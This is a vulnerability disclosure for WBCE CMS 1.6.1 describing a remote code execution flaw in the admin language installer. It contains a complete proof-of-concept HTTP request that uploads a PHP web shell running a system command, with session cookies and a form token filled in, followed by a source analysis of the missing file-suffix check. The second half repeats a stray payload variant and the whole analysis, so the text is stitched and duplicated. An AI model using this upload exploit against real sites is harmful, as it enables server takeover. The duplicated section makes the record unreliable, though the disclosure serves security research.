By downloading https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1 After the construction is completed

Vulnerability lies in http://127.0.0.1/admin/languages/index.php


Attackers can upload PHP files, causing RCE

POC:

POST /admin/languages/install.php HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------382321890310304369272830113203

Content-Length: 533

Origin: http://127.0.0.1

Connection: close

Referer: http://127.0.0.1/admin/languages/index.php

Cookie: Hm_lvt_a8569fd6981018f096d774868306a054=1686458094; phpsessid-5824-sid=6rlf8lsb2ie7v7esbf7707s78a; WBCELastConnectJS=1689493731; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: same-origin

Sec-Fetch-User: ?1

-----------------------------382321890310304369272830113203

Content-Disposition: form-data; name="formtoken"

6992839a-84ca0426bd85508b058b9cfc930b714cc143b3e9

-----------------------------382321890310304369272830113203

Content-Disposition: form-data; name="userfile"; filename="hackshell.php"

Content-Type: application/octet-stream

<?php

system('ipconfig');

?>

-----------------------------382321890310304369272830113203

Content-Disposition: form-data; name="submit"

-----------------------------382321890310304369272830113203--


Vulnerability source code analysis:

Analyze the source code under/admin/languages/install.php


Starting from line 47, it is a file upload function


The vulnerability mainly occurs at line 78, which does not restrict files with a PHP suffix. After uploading a PHP file, the attacker determines the 'if' statement on line 82 and enters the 'require' function to include the file, resulting in RCE. Afterwards, the attacker abnormally enters the 'print' function_ Error generates an exception output. After the upgrade page is updated in line 89, it will enter line 90 for the unlink function. Therefore, our code execution can only be a one-time effect and cannot be saved for a long time

<?=system('ipconfig');?>

-----------------------------382321890310304369272830113203

Content-Disposition: form-data; name="submit"

-----------------------------382321890310304369272830113203--


Vulnerability source code analysis:

Analyze the source code under/admin/languages/install.php


Starting from line 47, it is a file upload function


The vulnerability mainly occurs at line 78, which does not restrict files with a PHP suffix. After uploading a PHP file, the attacker determines the 'if' statement on line 82 and enters the 'require' function to include the file, resulting in RCE. Afterwards, the attacker abnormally enters the 'print' function_ Error generates an exception output. After the upgrade page is updated in line 89, it will enter line 90 for the unlink function. Therefore, our code execution can only be a one-time effect and cannot be saved for a long time